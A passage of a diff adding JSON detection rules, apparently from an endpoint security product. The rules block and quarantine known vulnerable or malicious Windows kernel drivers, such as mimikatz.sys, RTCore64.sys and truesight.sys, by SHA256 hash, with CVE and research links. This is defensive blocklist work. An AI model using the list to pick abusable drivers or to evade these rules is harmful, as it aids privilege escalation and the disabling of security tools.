+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820754Z",
+ "creation_date": "2026-03-23T11:45:30.820756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa77a472e95c4d0a2271e5d7253a85af25c07719df26941b39082cfc0733071a",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64d4d9d2-3681-5f76-88bc-c186456b9efd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461867Z",
+ "creation_date": "2026-03-23T11:45:30.461882Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461891Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be70be9d84ae14ea1fa5ec68e2a61f6acfe576d965fe51c6bac78fba01a744fb",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64da875a-edbf-5509-902f-21ce7dfa93a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145400Z",
+ "creation_date": "2026-03-23T11:45:32.145404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145412Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4eaf2205cdd189cc96806bd5364a505f77ad5dbb622558cd374044965fd20658",
+ "comment": "Malicious Kernel Driver (aka driver_e1123b59.sys) [https://www.loldrivers.io/drivers/11a73c42-26aa-446b-8560-43eecb265091/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64e0b04d-dfe5-5e9a-8b5d-f584ef5e6dab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824004Z",
+ "creation_date": "2026-03-23T11:45:30.824007Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c85c10c26b9941abb5e7bc3e5a01a128da7c44b8b2a24b2d2654225d48ae6f8f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64f36027-17a5-5d2f-aaa5-a40117162dac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984729Z",
+ "creation_date": "2026-03-23T11:45:29.984731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984736Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab300e7e0d5d540900dbe11495b8d6788039d1cffb22e2dc2304b730a71eec97",
+ "comment": "Dangerous Physmem Kernel Driver (aka asmmap.Sys) [https://www.loldrivers.io/drivers/d0048840-970f-4ad5-9a07-1d39469d721f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64f70719-cc96-5d48-bdb8-840631d1a640",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613460Z",
+ "creation_date": "2026-03-23T11:45:29.613462Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613467Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11eecf9e6e2447856ed4cf86ee1cb779cfe0672c808bbd5934cf2f09a62d6170",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64f8d71e-7176-5b19-8f40-84386f638172",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152568Z",
+ "creation_date": "2026-03-23T11:45:31.152570Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4985e6dd1719e2b4d40e2748ea6d631fa75a8d0c36ef9f05a7bf910d7583700",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65062a53-1930-5b23-954b-0ef08c0d0350",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459651Z",
+ "creation_date": "2026-03-23T11:45:30.459655Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459664Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9b433a33dc72eb2622947b41f01d04a48cd71beac775a88f3f1e4c838090ee8",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "651ca25e-48ff-5848-9ee3-bccc52173c4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817017Z",
+ "creation_date": "2026-03-23T11:45:30.817019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817025Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e928948ee36fa14c99a9147cd3b8d4c8c1917c52b50857d922ac72ed55d1f8e7",
+ "comment": "Vulnerable Kernel Driver (aka SMARTEIO64.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "654326fb-92f9-5f74-b6ab-3abce2fa978a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613424Z",
+ "creation_date": "2026-03-23T11:45:29.613426Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613432Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c767a5895119154467ac3fce8e82c20e6538a4e54f6c109001c61f8abd58f9f8",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6544316f-5707-53b9-819f-928dec6519cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607452Z",
+ "creation_date": "2026-03-23T11:45:29.607455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "077aa8ff5e01747723b6d24cc8af460a7a00f30cd3bc80e41cc245ceb8305356",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "655f1e1e-3219-5d48-96a4-dbc9becca136",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619767Z",
+ "creation_date": "2026-03-23T11:45:29.619769Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619774Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c4ffe4815b5755d2609be21ba53c9157e8f71137f06fe35044406b968b80320",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65698cd5-87c1-544c-8b6c-92365c297401",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835349Z",
+ "creation_date": "2026-03-23T11:45:30.835352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06605cc9d052e471bfe48802dbd85c8fc3dfd0c0746878a42f7659888d4fc191",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6590d364-bed4-538a-b600-88e521308295",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974384Z",
+ "creation_date": "2026-03-23T11:45:29.974386Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974391Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f642b5e76572b80684d15bf48bb6e2b6d2743171280ab50502284808a515904",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6596fe30-7d44-5bcb-9cb5-17a79f12acbc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986214Z",
+ "creation_date": "2026-03-23T11:45:29.986218Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986224Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d055be2671e136c937f361cef905e295ddb6983526341f1d5f80a16b7655b40",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSBMon.sys) [https://www.loldrivers.io/drivers/babe348d-f160-41ec-9db9-2413b989c1f0/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65a6a867-6f41-5395-8c87-e3c751bfd7a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493763Z",
+ "creation_date": "2026-03-23T11:45:31.493766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493774Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "283f5edbbe9a4a65a7e421627a23a946233fb4dc9237ab395547f2a30f3d8f08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65abc760-c3fe-5026-abab-0d6f56c1dfbc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606558Z",
+ "creation_date": "2026-03-23T11:45:29.606560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ba919c4ab0eff0058547e3b57442212e5d3e34be28d826fc2a191883fa18b6e",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65b1d504-064e-5d74-b2c7-eddc67b917cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485321Z",
+ "creation_date": "2026-03-23T11:45:31.485325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "402d4ea7e321cf2cfbabc3908043dac1f1da6c630f9380979fcbc6c7a594c4bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65c04d2a-5d51-51a6-9c1b-3af7b24cc4ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816227Z",
+ "creation_date": "2026-03-23T11:45:30.816229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1463b7fec911c10a8c96d84eb7c0f9e95fa488d826647a591a38c0593f812a4",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65c5388f-c34f-5798-b031-229373ee7460",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827489Z",
+ "creation_date": "2026-03-23T11:45:30.827491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827497Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "adf94caaaa25cc59790e03095491cfb6cd572045bfafb2eb6d2ec54ee254dfb8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65c6d37a-5060-5797-a936-93d4d2e12eb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984157Z",
+ "creation_date": "2026-03-23T11:45:29.984158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984164Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008",
+ "comment": "Vulnerable Kernel Driver (aka OpenLibSys.sys) [https://www.loldrivers.io/drivers/2e4fedb0-30ed-400d-b4e1-b2b2004c1607/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65cc3d27-977b-547c-8765-1055e2d15b12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474650Z",
+ "creation_date": "2026-03-23T11:45:31.474654Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb810b820972a5817b7a7e793c3ba15eea67a234f54ed82a9db7ed57d2bce477",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65dbd266-bd59-5e13-af5c-1197a01cee35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818408Z",
+ "creation_date": "2026-03-23T11:45:31.818412Z",
+ "enabled": true,
